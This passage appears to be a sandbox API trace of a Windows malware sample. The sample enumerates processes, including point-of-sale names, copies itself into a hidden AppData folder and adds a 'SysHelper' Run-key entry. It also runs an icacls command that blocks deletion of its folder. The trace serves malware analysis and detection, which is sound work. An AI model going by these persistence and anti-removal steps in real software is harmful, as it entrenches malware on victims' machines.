out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.172] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0085.172] CloseHandle (hObject=0x5c0) returned 1 [0085.172] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5c0 [0085.172] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.174] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x270000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0085.174] CloseHandle (hObject=0x5c0) returned 1 [0085.174] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5c0 [0085.174] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.176] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xaf0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0085.176] CloseHandle (hObject=0x5c0) returned 1 [0085.176] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5c0 [0085.176] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.177] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x100000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0085.178] CloseHandle (hObject=0x5c0) returned 1 [0085.178] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5c0 [0085.178] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.179] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xce0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0085.180] CloseHandle (hObject=0x5c0) returned 1 [0085.180] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5c0 [0085.180] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.181] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1f0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0085.182] CloseHandle (hObject=0x5c0) returned 1 [0085.182] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5c0 [0085.182] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.183] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x270000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0085.183] CloseHandle (hObject=0x5c0) returned 1 [0085.183] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5c0 [0085.184] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.185] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0085.185] CloseHandle (hObject=0x5c0) returned 1 [0085.185] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x5c0 [0085.185] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.187] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2a0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0085.187] CloseHandle (hObject=0x5c0) returned 1 [0085.187] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x5c0 [0085.187] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.189] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x390000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0085.189] CloseHandle (hObject=0x5c0) returned 1 [0085.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x5c0 [0085.189] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.191] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0085.191] CloseHandle (hObject=0x5c0) returned 1 [0085.191] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x5c0 [0085.191] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.192] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe60000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0085.193] CloseHandle (hObject=0x5c0) returned 1 [0085.193] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x5c0 [0085.193] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.194] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xea0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0085.195] CloseHandle (hObject=0x5c0) returned 1 [0085.195] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5c0 [0085.195] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.196] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0085.196] CloseHandle (hObject=0x5c0) returned 1 [0085.196] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5c0 [0085.196] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.198] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="driven.exe") returned 0xa [0085.198] CloseHandle (hObject=0x5c0) returned 1 [0085.198] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5c0 [0085.198] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.199] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="bulgarian-competitions.exe") returned 0x1a [0085.200] CloseHandle (hObject=0x5c0) returned 1 [0085.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5c0 [0085.200] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.201] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="occurred folk.exe") returned 0x11 [0085.202] CloseHandle (hObject=0x5c0) returned 1 [0085.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x5c0 [0085.202] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.203] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1090000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="refuse lodging.exe") returned 0x12 [0085.203] CloseHandle (hObject=0x5c0) returned 1 [0085.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x0 [0085.203] CloseHandle (hObject=0x0) returned 0 [0085.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x0 [0085.204] CloseHandle (hObject=0x0) returned 0 [0085.204] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x0 [0085.204] CloseHandle (hObject=0x0) returned 0 [0085.204] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x5c0 [0085.204] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.206] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x400000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 0x7f [0085.206] CloseHandle (hObject=0x5c0) returned 1 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x28) returned 0x24a2d8 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32cff10 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32b5730 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32c19d0 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32d6cf8 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32d8ce8 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32d8f50 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32cb710 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32cb978 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32cbbe0 [0085.212] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x25c) returned 0x32cbe48 [0085.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18e2d0 | out: phkResult=0x18e2d0*=0x5c0) returned 0x0 [0085.218] RegQueryValueExW (in: hKey=0x5c0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18e2cc, lpData=0x18c9f8, lpcbData=0x18e2b0*=0x400 | out: lpType=0x18e2cc*=0x0, lpData=0x18c9f8*=0x0, lpcbData=0x18e2b0*=0x400) returned 0x2 [0085.218] RegCloseKey (hKey=0x5c0) returned 0x0 [0085.218] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0085.219] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0085.219] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" " [0085.219] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" ", pNumArgs=0x18e294 | out: pNumArgs=0x18e294) returned 0x3278930*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.219] lstrcpyW (in: lpString1=0x18c1f8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.219] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d9f8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0085.219] UuidCreate (in: Uuid=0x18e244 | out: Uuid=0x18e244) returned 0x0 [0085.219] UuidToStringW (in: Uuid=0x18e244, StringUuid=0x18e2d8 | out: StringUuid=0x18e2d8) returned 0x0 [0085.219] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x50) returned 0x32ff2e0 [0085.219] RpcMgmtStatsVectorFree (in: StatsVector=0x18e2d8 | out: StatsVector=0x18e2d8) returned 0x0 [0085.219] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="3af89e63-1a12-46ae-ba57-0b2d2fa1411a" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a") returned 1 [0085.219] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a"), lpSecurityAttributes=0x0) returned 1 [0085.220] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xb0) returned 0x32a71e8 [0085.220] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xb0) returned 0x32a72a0 [0085.220] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a", pMore="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 1 [0085.220] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0 [0085.221] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe"), bFailIfExists=0) returned 1 [0085.253] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18e2d4 | out: phkResult=0x18e2d4*=0x5c4) returned 0x0 [0085.253] lstrcpyW (in: lpString1=0x18d1f8, lpString2="\"" | out: lpString1="\"") returned="\"" [0085.253] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.253] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart" [0085.253] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart") returned 222 [0085.253] RegSetValueExW (in: hKey=0x5c4, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart", cbData=0x1bc | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart") returned 0x0 [0085.254] RegCloseKey (hKey=0x5c4) returned 0x0 [0085.254] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x1b0) returned 0x32cc0b0 [0085.254] SetLastError (dwErrCode=0x0) [0085.254] lstrcpyW (in: lpString1=0x18b1f8, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0085.254] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a" [0085.254] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0085.254] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1f8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e254 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18e254*(hProcess=0x5c8, hThread=0x5c0, dwProcessId=0x1c0, dwThreadId=0x7c0)) returned 1 [0085.388] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.392] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.408] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.423] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.439] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.455] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.470] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.486] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.501] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.517] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.662] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.673] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.689] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.704] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.720] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.735] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.751] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.767] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.782] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.798] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.813] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.829] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.845] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.860] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.876] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.891] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.907] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.924] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.938] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.954] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.970] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x102 [0085.985] WaitForSingleObject (hHandle=0x5c8, dwMilliseconds=0x1) returned 0x0 [0085.997] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32a72a0 | out: hHeap=0x220000) returned 1 [0085.997] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32ff2e0 | out: hHeap=0x220000) returned 1 [0085.997] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x1b0) returned 0x32d6f60 [0085.997] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x1b0) returned 0x32d7118 [0085.997] CoInitialize (pvReserved=0x0) returned 0x0 [0086.590] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0086.597] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x1b0) returned 0x32d74a8 [0086.603] 